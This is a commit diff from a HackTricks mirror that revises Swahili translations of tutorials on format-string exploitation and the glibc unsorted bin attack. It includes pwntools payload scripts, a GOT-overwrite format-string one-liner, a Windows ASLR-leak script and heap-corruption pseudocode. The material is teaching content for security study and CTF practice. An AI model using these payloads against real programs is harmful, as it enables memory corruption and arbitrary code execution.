maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/windows-hardening/windows-local-privilege-escalatio

Browse Source
This commit is contained in:
Translator 2025-08-29 12:36:35 +00:00
parent 8470ce4342
commit 60da441c7e
25 changed files with 2167 additions and 2140 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

91
src/binary-exploitation/format-strings/README.md
View File

@ -5,13 +5,13 @@
## Taarifa za Msingi
Katika C **`printf`** ni funsi inayoweza kutumika **kuchapisha** kamba ya herufi. Parameta ya kwanza ambayo funsi hii inatarajia ni maandishi ghafi yenye **vibadilishi vya muundo**. Parameta zinazofuata ni thamani zitakazobadilisha **vibadilishi vya muundo** katika maandishi ghafi.
Katika C **`printf`** ni function inayoweza kutumika **kuchapisha** kamba ya maandishi. Kigezo cha **kwanza** ambacho function hii inatarajia ni **maandishi ya ghafi yenye formatters**. Kigezo kinachofuata kinatarajiwa kuwa ni **thamani** za **kuchukua nafasi** za **formatters** kutoka kwa maandishi ya ghafi.
Funsi nyingine zilizo na udhaifu ni **`sprintf()`** na **`fprintf()`**.
Functions nyingine zilizo hatarini ni **`sprintf()`** na **`fprintf()`**.
Udhaifu hujitokeza wakati maandishi ya mshambuliaji yanapotumika kama hoja ya kwanza kwa funsi hii. Mshambuliaji ataweza kutengeneza ingizo maalum akitumia vibaya uwezo wa printf format string kusoma na kuandika data yoyote kwenye anwani yoyote (readable/writable). Kwa njia hii atakuwa na uwezo wa execute arbitrary code.
Utaratibu huo wa udhaifu hutokea wakati **maandishi ya mshambuliaji yanapotumika kama hoja ya kwanza** kwa function hii. Mshambuliaji ataweza kutengeneza **ingizo maalum akitumia mbinu za printf format** kusoma na **kuandika data yoyote kwenye anuani yoyote (inayosomwa/inaoweza kuandikwa)**. Kwa njia hii ataweza **kutekeleza code yoyote anayoitaka**.
#### Vibadilishi:
#### Vitambulishi (Formatters):
```bash
%08x —> 8 hex bytes
%d —> Entire
@ -24,7 +24,7 @@ Udhaifu hujitokeza wakati maandishi ya mshambuliaji yanapotumika kama hoja ya kw
```
**Mifano:**
- Mfano dhaifu:
- Mfano wenye udhaifu:
```c
char buffer[30];
gets(buffer); // Dangerous: takes user input without restrictions.
@ -35,11 +35,11 @@ printf(buffer); // If buffer contains "%x", it reads from the stack.
int value = 1205;
printf("%x %x %x", value, value, value); // Outputs: 4b5 4b5 4b5
```
- Kwa Vigezo Vilivyokosekana:
- Kwa hoja zilizokosekana:
```c
printf("%x %x %x", value); // Unexpected output: reads random values from the stack.
```
- fprintf dhaifu:
- fprintf wenye udhaifu:
```c
#include <stdio.h>
@ -54,26 +54,26 @@ return 0;
```
### **Kupata Pointers**
Muundo **`%<n>$x`**, ambapo `n` ni nambari, unaruhusu kuagiza printf ichague kigezo cha n (kutoka kwenye stack). Kwa hivyo, ikiwa unataka kusoma kigezo cha nne kutoka kwenye stack ukitumia printf unaweza kufanya:
Muundo **`%<n>$x`**, ambapo `n` ni nambari, huruhusu kuagiza printf ichague param ya n (kutoka kwenye stack). Hivyo, ikiwa unataka kusoma param ya 4 kutoka kwenye stack kwa kutumia printf unaweza kufanya:
```c
printf("%x %x %x %x")
```
na ungeweza kusoma kutoka param ya kwanza hadi param ya nne.
na ungeisoma kutoka param ya kwanza hadi param ya nne.
Au unaweza kufanya:
```c
printf("%4$x")
```
na soma moja kwa moja ya nne.
na kusoma moja kwa moja ile ya nne.
Kumbuka kwamba mshambuliaji anadhibiti `printf` **parameter, ambayo kwa msingi wake inamaanisha kwamba** ingizo lake litawekwa kwenye stack wakati `printf` itakapoitwa, ambayo inamaanisha anaweza kuandika specific memory addresses kwenye stack.
Tambua kwamba mshambulizi anadhibiti parameter ya `printf`, ambayo kwa msingi inamaanisha kwamba input yake itakuwa kwenye stack wakati `printf` inapoitwa, na hivyo anaweza kuandika memory addresses maalum kwenye stack.
> [!CAUTION]
> Mshambuliaji anayeudhibiti ingizo hili ataweza **add arbitrary address in the stack and make `printf` access them**. Katika sehemu inayofuata itafafanuliwa jinsi ya kutumia tabia hii.
> Mshambulizi anayetumia input hii ataweza **kuongeza arbitrary address kwenye stack na kufanya `printf` ziifikie**. Katika sehemu inayofuata itafafanuliwa jinsi ya kutumia tabia hii.
## **Arbitrary Read**
Inawezekana kutumia formatter **`%n$s`** kufanya **`printf`** ichukue **address** iliyoko kwenye **n position**, kufuatilia na **kuiprint kama ingekuwa string** (kuprint hadi 0x00 inapopatikana). Kwa hiyo ikiwa base address ya binary ni **`0x8048000`**, na tunajua kwamba user input inaanza kwenye 4th position kwenye stack, inawezekana kuprint mwanzo wa binary kwa:
Inawezekana kutumia formatter **`%n$s`** kufanya **`printf`** ichukue **address** iliyoko katika **nafasi n**, kuifuata na **kuichapisha kana kwamba ni string** (inachapisha hadi 0x00 ipatikane). Kwa hivyo ikiwa base address ya binary ni **`0x8048000`**, na tunajua kwamba user input inaanza kwenye nafasi ya 4 kwenye stack, inawezekana kuchapisha mwanzo wa binary kwa:
```python
from pwn import *
@ -87,11 +87,11 @@ p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
```
> [!CAUTION]
> Kumbuka huwezi kuweka anwani 0x8048000 mwanzoni mwa input kwa sababu string itakuwa cat katika 0x00 mwishoni mwa anwani hiyo.
> Kumbuka kwamba huwezi kuweka anwani 0x8048000 mwanzoni mwa input kwa sababu string itakatwa kwa 0x00 mwishoni mwa anwani hiyo.
### Tafuta offset
Ili kupata offset kwa input yako, unaweza kutuma 4 au 8 bytes (`0x41414141`) ikifuatiwa na **`%1$x`** na **ongeza** thamani hadi utakapopata `A's`.
Ili kupata offset kwa input yako unaweza kutuma 4 au 8 bytes (`0x41414141`) ikifuatiwa na **`%1$x`** na **ongeza** thamani mpaka utakapopata `A's`.
<details>
@ -126,45 +126,45 @@ p.close()
```
</details>
### Ni muhimu vipi
### Inavyosaidia
Arbitrary reads zinaweza kuwa muhimu kwa:
Arbitrary reads zinaweza kusaidia kwa:
- **Dump** the **binary** from memory
- **Access specific parts of memory where sensitive** **info** is stored (like canaries, encryption keys or custom passwords like in this [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))
- **Dump** the **binary** kutoka kumbukumbu
- **Pata sehemu maalum za kumbukumbu ambapo** **taarifa nyeti** imehifadhiwa (kama canaries, encryption keys au custom passwords kama katika [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))
## **Arbitrary Write**
The formatter **`%<num>$n`** **writes** the **number of written bytes** in the **indicated address** in the <num> param in the stack. Ikiwa mshambuliaji anaweza kuandika herufi kwa wingi anayetaka kwa kutumia printf, ataweza kumfanya **`%<num>$n`** iandike namba yoyote katika anuani yoyote.
The formatter **`%<num>$n`** **inaandika** **idadi ya bytes zilizyoandikwa** katika **anwani iliyoonyeshwa** kwenye param ya <num> kwenye stack. Ikiwa mshambulizi anaweza kuandika char nyingi kadri atakavyotaka kwa printf, ataweza kufanya **`%<num>$n`** iandike nambari yoyote katika anwani yoyote.
Kwa bahati nzuri, ili kuandika namba 9999, haitohitaji kuongeza "A" 9999 kwenye input; badala yake inawezekana kutumia formatter **`%.<num-write>%<num>$n`** kuandika namba **`<num-write>`** katika **anuani inayonyoshwa na nafasi ya `num`**.
Kwa bahati nzuri, kuandika nambari 9999 hakuhitaji kuongeza "A" 9999 kwenye input; badala yake inawezekana kutumia formatter **`%.<num-write>%<num>$n`** kuandika nambari **`<num-write>`** kwenye **anwani inayorejelewa na nafasi ya `num`**.
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
```
Hata hivyo, kumbuka kwamba kawaida ili kuandika anwani kama `0x08049724` (ambayo ni Nambari KUBWA kuandika kwa mara moja), **inatumika `$hn`** badala ya `$n`. Hii inawezesha **kuandika tu 2 Bytes**. Kwa hiyo operesheni hii hufanywa mara mbili, moja kwa 2B za juu za anwani na tena kwa zile za chini.
Hata hivyo, kumbuka kuwa kawaida ili kuandika anwani kama `0x08049724` (ambayo ni namba KUBWA kuandika kwa mara moja), **inatumika `$hn`** badala ya `$n`. Hii inaruhusu **kuandika Bytes 2 tu**. Kwa hivyo operesheni hii hufanywa mara mbili, moja kwa 2B za juu zaidi za anwani na mara nyingine kwa zile za chini.
Kwa hivyo, uharibifu huu unawezesha **kuandika kitu chochote katika anwani yoyote (arbitrary write).**
Kwa hivyo, udhaifu huu unaruhusu **kuandika chochote katika anwani yoyote (arbitrary write).**
Katika mfano huu, lengo litakuwa **kuandika upya** **anwani** ya **function** katika jedwali la **GOT** ambayo itaitwa baadaye. Ingawa hii inaweza kutumia mbinu nyingine za arbitrary write to exec:
Katika mfano huu, lengo litakuwa **overwrite** anwani ya **function** katika jedwali la **GOT** ambayo itaitwa baadaye. Ingawa hii inaweza kutumia mbinu nyingine za arbitrary write to exec:
{{#ref}}
../arbitrary-write-2-exec/
{{#endref}}
Tutafanya **kuandika upya** **function** ambayo **inapokea** hoja zake kutoka kwa mtumiaji na kuielekeza kwa **`system`** **function**.\
Kama ilivyotajwa, kuandika anwani kawaida kunahitaji hatua 2: Kwanza unaandika **2Bytes** za anwani kisha zile nyingine 2. Kufanya hivyo **`$hn`** inatumika.
Tutafanya **overwrite** ya **function** ambayo **hupokea** hoja zake (arguments) kutoka kwa **user** na **kuielekeza** kwenye **`system`** **function**.\
Kama ilivyotajwa, kuandika anwani kawaida kunahitaji hatua 2: Unaandika **awali 2Bytes** za anwani kisha zile nyingine 2. Kwa kufanya hivyo hutumika **`$hn`**.
- **HOB** inarejelewa kwa 2 bytes za juu za anwani
- **LOB** inarejelewa kwa 2 bytes za chini za anwani
- **HOB** inaitwa kwa 2 Bytes za juu za anwani
- **LOB** inaitwa kwa 2 Bytes za chini za anwani
Kisha, kutokana na jinsi format string inavyofanya kazi lazima **uandike kwanza ndogo zaidi** ya [HOB, LOB] kisha nyingine.
Kisha, kutokana na jinsi format string inavyofanya kazi unahitaji **kuandika kwanza ile ndogo** ya \[HOB, LOB] kisha ile nyingine.
Ikiwa HOB < LOB\
If HOB < LOB\
`[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]`
Ikiwa HOB > LOB\
If HOB > LOB\
`[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]`
HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB
@ -173,7 +173,7 @@ python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "
```
### Pwntools Kiolezo
Unaweza kupata **kiolezo** cha kuandaa exploit kwa aina hii ya udhaifu katika:
Unaweza kupata **kiolezo** la kuandaa exploit kwa aina hii ya udhaifu katika:
{{#ref}}
@ -201,17 +201,17 @@ p.interactive()
```
## Format Strings to BOF
Ni uwezekano kutumia vibaya vitendo vya kuandika vya format string vulnerability ili **kuandika kwenye anwani za stack** na kushambulia aina ya **buffer overflow**.
Inawezekana kutumia vibaya vitendo vya kuandika vya format string vulnerability ili **kuandika katika anwani za stack** na exploit aina ya **buffer overflow**.
## Windows x64: Format-string leak to bypass ASLR (no varargs)
On Windows x64 vigezo vinne vya kwanza vya integer/pointer hupitishwa kwa registers: RCX, RDX, R8, R9. Katika call-sites nyingi zenye mdudu, attacker-controlled string hutumiwa kama format argument lakini hakuna variadic arguments zinazotolewa, kwa mfano:
On Windows x64 the first four integer/pointer parameters are passed in registers: RCX, RDX, R8, R9. In many buggy call-sites the attacker-controlled string is used as the format argument but no variadic arguments are provided, for example:
```c
// keyData is fully controlled by the client
// _snprintf(dst, len, fmt, ...)
_snprintf(keyStringBuffer, 0xff2, (char*)keyData);
```
Kwa sababu hakuna varargs zinazopelekwa, any conversion like "%p", "%x", "%s" itasababisha CRT kusoma the next variadic argument kutoka kwa rejista inayofaa. With the Microsoft x64 calling convention the first such read for "%p" comes from R9. Whatever transient value is in R9 at the call-site will be printed. In practice this often leaks a stable in-module pointer (e.g., a pointer to a local/global object previously placed in R9 by surrounding code or a callee-saved value), which can be used to recover the module base and defeat ASLR.
Kwa sababu hakuna varargs zinazopitishwa, conversion yoyote kama "%p", "%x", "%s" itasababisha CRT kusoma the next variadic argument kutoka kwa register inayofaa. Kwa Microsoft x64 calling convention, kusomwa kwa kwanza kwa "%p" kunatokea kutoka R9. Thamani yoyote ya muda iliyoko ndani ya R9 wakati wa call-site itachapishwa. Kivitendo hili mara nyingi huleak in-module pointer thabiti (mfano, pointer kwa local/global object iliyowekwa hapo awali katika R9 na surrounding code au callee-saved value), ambayo inaweza kutumika kurecover module base na kushinda ASLR.
Practical workflow:
@ -231,26 +231,27 @@ leaked = int(io.recvline().split()[2], 16) # e.g. 0x7ff6693d0660
base = leaked - 0x20660 # module base = leak - offset
print(hex(leaked), hex(base))
```
Vidokezo:
- Offset kamili ya kutoa hupatikana mara moja wakati wa local reversing kisha kutumika tena (same binary/version).
- Ikiwa "%p" haitachapisha pointer halali katika jaribio la kwanza, jaribu specifiers nyingine ("%llx", "%s") au conversions nyingi ("%p %p %p") ili kusampuli registers/stack za argument nyingine.
- Mfano huu ni maalum kwa Windows x64 calling convention na implementations za printf-family ambazo hunyakua varargs zisizo zipo kutoka registers wakati format string inazoziomba.
Notes:
- Offset sahihi ya kutoa hupatikana mara moja wakati wa local reversing kisha kutumika tena (same binary/version).
- Ikiwa "%p" haitachapishi pointer halali kwenye jaribio la kwanza, jaribu specifiers wengine ("%llx", "%s") au conversions nyingi ("%p %p %p") ili kuchukua sampuli ya argument registers/stack nyingine.
- Mfumo huu ni maalum kwa Windows x64 calling convention na implementations za printf-family ambazo hupakua varargs zisizokuwepo kutoka registers wakati format string inazowahitaji.
Mbinu hii ni muhimu sana kuanzisha ROP kwenye Windows services zilizotengenezwa kwa ASLR na bila primitives wazi za memory disclosure.
Mbinu hii ni muhimu sana kuanzisha ROP kwenye Windows services zilizojengwa na ASLR na ambazo hazina memory disclosure primitives za wazi.
## Mifano Nyingine & Marejeo
## Other Examples & References
- [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string)
- [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
- [https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak)
- [https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html](https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html)
- 32 bit, no relro, no canary, nx, no pie, matumizi ya msingi ya format strings ku-leak flag kutoka stack (hakuna haja ya kubadilisha mtiririko wa utekelezaji)
- 32 bit, no relro, no canary, nx, no pie, matumizi ya msingi ya format strings ili leak the flag kutoka kwenye stack (hakuna haja ya kubadilisha execution flow)
- [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html)
- 32 bit, relro, no canary, nx, no pie, format string ili ku-overwrite address ya `fflush` na win function (ret2win)
- 32 bit, relro, no canary, nx, no pie, format string ya kuandika juu address `fflush` na win function (ret2win)
- [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html)
- 32 bit, relro, no canary, nx, no pie, format string ya kuandika address ndani ya main katika `.fini_array` (kwa hivyo flow inarudi tena mara 1) na kuandika address ya `system` kwenye GOT table ikielekeza kwa `strlen`. Wakati flow inaporudi main, `strlen` itatekelezwa na user input na ikiwa inamaanisha `system`, itatekeleza amri zilizopitishwa.
- 32 bit, relro, no canary, nx, no pie, format string ya kuandika address ndani ya main kwenye `.fini_array` (kwa hivyo flow inarudi tena mara 1) na kuandika address kwa `system` kwenye GOT table inayoelekeza kwa `strlen`. Wakati flow inaporudi main, `strlen` itatekelezwa na user input na ikiwa inarejea kwa `system`, itatekeleza amri zilizopitishwa.
## Marejeo
## References
- [HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE)](https://0xdf.gitlab.io/2025/08/26/htb-reaper.html)
- [x64 calling convention (MSVC)](https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention)

118
src/binary-exploitation/libc-heap/unsorted-bin-attack.md
View File

@ -2,70 +2,72 @@
{{#include ../../banners/hacktricks-training.md}}
## Taarifa za Msingi
## Maelezo ya Msingi
For more information about what is an unsorted bin check this page:
Kwa taarifa zaidi kuhusu what is an unsorted bin angalia ukurasa huu:
{{#ref}}
bins-and-memory-allocations.md
{{#endref}}
Unsorted lists zinaweza kuandika anwani ya `unsorted_chunks (av)` katika anwani ya `bk` ya chunk. Kwa hiyo, ikiwa mshambuliaji anaweza **kubadilisha anwani ya pointer `bk`** katika chunk ndani ya unsorted bin, angeweza kuwa na uwezo wa **kuandika anwani hiyo mahali popote** ambayo inaweza kusaidia ku-leak anwani za Glibc au kuruka utetezi fulani.
Unsorted lists zinaweza kuandika anwani ya `unsorted_chunks (av)` katika anwani ya `bk` ya chunk. Kwa hivyo, ikiwa attacker anaweza **kubadilisha anwani ya pointer ya `bk`** katika chunk ndani ya unsorted bin, anaweza kuwa na uwezo wa **kuandika anwani hiyo kwenye anwani yoyote** ambayo inaweza kusaidia ku-leak anwani za Glibc au kupitisha baadhi ya ulinzi.
Kwa msingi, shambulio hili huruhusu **kuweka namba kubwa kwenye anwani yoyote**. Namba kubwa hii ni anwani, ambayo inaweza kuwa anwani ya heap au anwani ya Glibc. Lengo la jadi lilikuwa **`global_max_fast`** kuruhusu kuunda fast bin bins zenye ukubwa mkubwa (na kutoka unsorted bin attack kwenda fast bin attack).
Kimsingi, shambulio hili huruhusu **kuweka namba kubwa kwenye anwani yoyote**. Namba hii kubwa ni anwani, ambayo inaweza kuwa anwani ya heap au anwani ya Glibc. Lengo la jadi lilikuwa **`global_max_fast`** ili kuwezesha kuunda fast bins zenye ukubwa mkubwa (na kusonga kutoka unsorted bin attack hadi fast bin attack).
- Modern note (glibc ≥ 2.39): `global_max_fast` became an 8bit global. Blindly writing a pointer there via an unsorted-bin write will clobber adjacent libc data and will not reliably raise the fastbin limit anymore. Prefer other targets or other primitives when running against glibc 2.39+. See "Modern constraints" below and consider combining with other techniques like a [large bin attack](large-bin-attack.md) or a [fast bin attack](fast-bin-attack.md) once you have a stable primitive.
- Modern note (glibc ≥ 2.39): `global_max_fast` imekuwa globali ya 8bit. Kuandika pointer pale bila kujali kupitia unsortedbin write kutaharibu data za libc jirani na haitainua kwa uhakika kikomo cha fastbin tena. Chagua malengo mengine au primitives nyingine unapokimbia dhidi ya glibc 2.39+. Angalia "Modern constraints" hapa chini na fikiria kuunganisha na mbinu nyingine kama [large bin attack](large-bin-attack.md) au [fast bin attack](fast-bin-attack.md) ukipata primitive thabiti.
> [!TIP]
> T> Kuangalia mfano uliotolewa katika [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle) na kutumia 0x4000 na 0x5000 badala ya 0x400 na 0x500 kama chunk sizes (ili kuepuka Tcache) inawezekana kuona kwamba **siku za hivi karibuni** hitilafu **`malloc(): unsorted double linked list corrupted`** inachochewa.
> Kuangalia mfano uliotolewa katika [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle) na kutumia 0x4000 na 0x5000 badala ya 0x400 na 0x500 kama sizes za chunk (kuepuka Tcache) inaonyesha kuwa **sasa** kosa **`malloc(): unsorted double linked list corrupted`** linaibuliwa.
>
> Hivyo, shambulio hili la unsorted bin sasa (miongoni mwa ukaguzi mwingine) pia linahitaji kuwa na uwezo wa kurekebisha double linked list ili kupitisha ukaguzi `victim->bk->fd == victim` au `victim->fd == av (arena)`, ambayo inamaanisha kwamba anwani tunayotaka kuandika lazima iwe na anwani ya fake chunk katika nafasi yake ya `fd` na kwamba `fd` ya fake chunk inarejea kwa arena.
> Kwa hivyo, shambulio hili la unsorted bin sasa (pamoja na ukaguzi mwingine) pia linahitaji uwezo wa kurekebisha double linked list ili kuepuka ukaguzi huo `victim->bk->fd == victim` au `victim->fd == av (arena)`, ambayo ina maana anwani tunayotaka kuandika lazima iwe na anwani ya fake chunk katika nafasi yake ya `fd` na kwamba `fd` ya fake chunk inazingatia arena.
> [!CAUTION]
> Kumbuka kwamba shambulio hili linaharibu unsorted bin (na hivyo small na large pia). Kwa hivyo sasa tunaweza tu **kutumia allocations kutoka fast bin** (programu ngumu zaidi inaweza kufanya allocations nyingine na ku-crash), na ili kuchochea hili lazima **tufanye allocation ya ukubwa uleule au programu ita-crash.**
> Kumbuka kwamba shambulio hili linaharibu unsorted bin (na hivyo ndogo na kubwa pia). Kwa hivyo tunaweza tu **kutumia allocations kutoka fast bin sasa** (programu ngumu zaidi inaweza kufanya allocations nyingine na ku-crash), na kuamsha hili lazima **tunallocate ukubwa ule huo au programu ita-crash.**
>
> Kumbuka kwamba kuandika juu ya **`global_max_fast`** kunaweza kusaidia katika kesi hii kwa kuamini kuwa fast bin itashughulikia allocations zote nyingine hadi exploit itakapokamilika.
> Kumbuka kwamba kuandika juu ya **`global_max_fast`** kunaweza kusaidia katika kesi hii ukitegemea kuwa fast bin itashughulikia allocations nyingine zote hadi exploit itakapokamilika.
Msimbo kutoka kwa [**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin_attack/unsorted_explanation/index.html) unaelezea vizuri sana, ingawa ukibadilisha mallocs kuomba memory kubwa vya kutosha ili zisimalizike kwenye Tcache utaona kuwa hitilafu iliyotajwa hapo juu inaonekana ikizuia mbinu hii: **`malloc(): unsorted double linked list corrupted`**
Msimbo kutoka kwa [**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin_attack/unsorted_explanation/index.html) unaelezea vizuri sana, ingawa ikiwa utakusanya mallocs ili kuwasilisha memory kubwa vya kutosha ili tusifikie Tcache utaona kwamba kosa lililotajwa hapo juu linaibuka na kuzuia mbinu hii: **`malloc(): unsorted double linked list corrupted`**
### Jinsi uandishi unavyotokea kwa kweli
- Uandishi wa unsorted-bin huchochewa wakati wa `free` wakati chunk iliyofunguliwa inaingizwa kwenye kichwa cha unsorted list.
- Wakati wa kuingiza, allocator hufanya `bck = unsorted_chunks(av); fwd = bck->fd; victim->bk = bck; victim->fd = fwd; fwd->bk = victim; bck->fd = victim;`
- The unsorted-bin write inafanywa wakati wa `free` wakati chunk iliyofunguliwa inaingizwa kuwa kichwa cha unsorted list.
- During insertion, the allocator performs `bck = unsorted_chunks(av); fwd = bck->fd; victim->bk = bck; victim->fd = fwd; fwd->bk = victim; bck->fd = victim;`
- Ikiwa unaweza kuweka `victim->bk` kuwa `(mchunkptr)(TARGET - 0x10)` kabla ya kuita `free(victim)`, taarifa ya mwisho itafanya uandishi: `*(TARGET) = victim`.
- Baadaye, wakati allocator inashughulikia unsorted bin, ukaguzi wa uadilifu utathibitisha (miongoni mwa mambo mengine) kwamba `bck->fd == victim` na `victim->fd == unsorted_chunks(av)` kabla ya unlinking. Kwa sababu uingizaji tayari uliandika `victim` ndani ya `bck->fd` (TARGET yetu), ukaguzi huu unaweza kutimizwa ikiwa uandishi ulifanikiwa.
- Baadaye, wakati allocator itakaposhughulikia unsorted bin, ukaguzi wa integriti utathibitisha (pamoja na mambo mengine) kwamba `bck->fd == victim` na `victim->fd == unsorted_chunks(av)` kabla ya unlinking. Kwa sababu insertion tayari iliandika `victim` ndani ya `bck->fd` (TARGET yetu), ukaguzi huu unaweza kukidhiwa kama uandishi ulifanikiwa.
## Modern constraints (glibc ≥ 2.33)
Ili kutumia unsortedbin writes kwa kuaminika kwenye glibc ya sasa:
Ili kutumia unsortedbin writes kwa uhakika kwenye glibc ya sasa:
- Tcache interference: kwa sizes zinazopungua katika tcache, frees zinaelekezwa huko na hazitoghushi unsorted bin. Aidha:
- fanya maombi yenye sizes > MAX_TCACHE_SIZE (≥ 0x410 kwenye 64bit kwa default), au
- jaza tcache bin inayolingana (entries 7) ili frees nyingine zifikie global bins, au
- ikiwa mazingira yanaweza kudhibitiwa, zima tcache (mfano, GLIBC_TUNABLES glibc.malloc.tcache_count=0).
- Integrity checks on the unsorted list: kwenye njia inayofanya allocation inayotazama unsorted bin, glibc hukagua (imepunguzwa):
- Tcache interference: kwa sizes zinazopingana na tcache, frees zinaelekezwa huko na hazitagusa unsorted bin. Au
- fanya requests za sizes > MAX_TCACHE_SIZE (≥ 0x410 kwa 64bit kwa default), au
- jaza tcache bin inayohusiana (entries 7) ili frees za ziada zifikie global bins, au
- kama mazingira yanaweza kudhibitiwa, zima tcache (mfano, GLIBC_TUNABLES glibc.malloc.tcache_count=0).
- Integrity checks kwenye unsorted list: kwenye njia inayofuata ya allocation inayotazama unsorted bin, glibc inakagua (simplified):
- `bck->fd == victim` na `victim->fd == unsorted_chunks(av)`; vinginevyo inakata na `malloc(): unsorted double linked list corrupted`.
- Hii inamaanisha anwani unayolenga lazima kustahimili maandishi mawili: kwanza `*(TARGET) = victim` wakati wa free; baadaye, wakati chunk inapoondolewa, `*(TARGET) = unsorted_chunks(av)` (allocator anarudisha `bck->fd` kwa kichwa cha bin). Chagua malengo ambapo kulazimisha tu thamani kubwa isiyo-nya ni muhimu.
- Typical stable targets in modern exploits
- Hali ya programu au global inayotenda "large" values kama flags/limits.
- Indirect primitives (mfano, kuandaa kwa ajili ya [fast bin attack]({{#ref}}fast-bin-attack.md{{#endref}}) inayofuata au ku-pivot kwa writewhatwhere baadaye).
- Epuka `__malloc_hook`/`__free_hook` kwenye glibc mpya: zilitolewa kwenye 2.34. Epuka `global_max_fast` kwenye ≥ 2.39 (angalia nota ifuatayo).
- About `global_max_fast` on recent glibc
- On glibc 2.39+, `global_max_fast` is an 8bit global. The classic trick of writing a heap pointer into it (to enlarge fastbins) no longer works cleanly and is likely to corrupt adjacent allocator state. Prefer other strategies.
- Hii ina maana anwani unayolenga lazima ivumilie uandishi mara mbili: kwanza `*(TARGET) = victim` wakati wa free; baadaye, wakati chunk inapoondolewa, `*(TARGET) = unsorted_chunks(av)` (allocator anaandika tena `bck->fd` kurudi kichwani mwa bin). Chagua malengo ambapo kulazimisha tu thamani kubwa isiyokuwa sifuri ni muhimu.
- Malengo ya kawaida thabiti katika exploits za kisasa
- State ya programu au global inayotumiwa kama "large" values kama flags/limits.
- Indirect primitives (mfano, kuandaa kwa ajili ya [fast bin attack]({{#ref}}fast-bin-attack.md{{#endref}}) inayofuata au kupindisha uandishi mwingine wa writewhatwhere).
- Epuka `__malloc_hook`/`__free_hook` kwenye glibc mpya: ziliondolewa katika 2.34. Epuka `global_max_fast` kwenye ≥ 2.39 (ona nota ifuatayo).
Kuhusu `global_max_fast` kwenye glibc za karibuni
- Katika glibc 2.39+, `global_max_fast` ni globali ya 8bit. Mbinu ya kawaida ya kuandika pointer ya heap humo (kuongeza fastbins) haifanyi kazi safi tena na ina uwezekano wa kuharibu state ya allocator jirani. Tumia mikakati mingine.
## Minimal exploitation recipe (modern glibc)
Goal: achieve a single arbitrary write of a heap pointer to an arbitrary address using the unsortedbin insertion primitive, without crashing.
Lengo: pata uandishi mmoja wa anwani ya heap kwenye anwani yoyote ukitumia unsortedbin insertion primitive, bila kuleta crash.
- Layout/grooming
- Allocate A, B, C with sizes large enough to bypass tcache (e.g., 0x5000). C prevents consolidation with the top chunk.
- Allocate A, B, C kwa sizes kubwa vya kutosha kuepuka tcache (mfano, 0x5000). C inazuia consolidation na top chunk.
- Corruption
- Overflow from A into Bs chunk header to set `B->bk = (mchunkptr)(TARGET - 0x10)`.
- Overflow kutoka A hadi header ya chunk ya B ili seti `B->bk = (mchunkptr)(TARGET - 0x10)`.
- Trigger
- `free(B)`. At insertion time the allocator executes `bck->fd = B`, therefore `*(TARGET) = B`.
- `free(B)`. Wakati wa insertion allocator itatekeleza `bck->fd = B`, hivyo `*(TARGET) = B`.
- Continuation
- If you plan to continue allocating and the program uses the unsorted bin, expect the allocator to later set `*(TARGET) = unsorted_chunks(av)`. Both values are typically large and may be enough to change size/limit semantics in targets that only check for "big".
- Ikiwa unapanga kuendelea na kuallocate na programu inatumia unsorted bin, tarajia allocator baadaye kuweka `*(TARGET) = unsorted_chunks(av)`. Thamani zote mbili kwa kawaida ni kubwa na zinaweza kutosha kubadilisha semantics za size/limit kwenye malengo ambayo yanangalia tu "big".
Pseudocode skeleton:
```c
@ -80,33 +82,33 @@ void *C = malloc(0x5000); // guard
free(B); // triggers *(TARGET) = B (unsorted-bin insertion write)
```
> [!NOTE]
> • Ikiwa huwezi kupita tcache kwa ukubwa, jaza tcache bin kwa ukubwa uliyoichagua (7 frees) kabla ya kuifree corrupted chunk ili free iende kwenye unsorted.
> • Ikiwa programu inakatika mara moja kwenye allocation inayofuata kutokana na unsorted-bin checks, angalia tena kwamba `victim->fd` bado ni sawa na bin head na kwamba `TARGET` yako inashikilia pointer kamili ya `victim` baada ya uandishi wa kwanza.
> • Ikiwa huwezi kupitisha tcache kwa ukubwa, jaza tcache bin kwa ukubwa ulioteuliwa (7 frees) kabla ya kuachilia chunk iliyoharibika ili free iende kwenye unsorted.
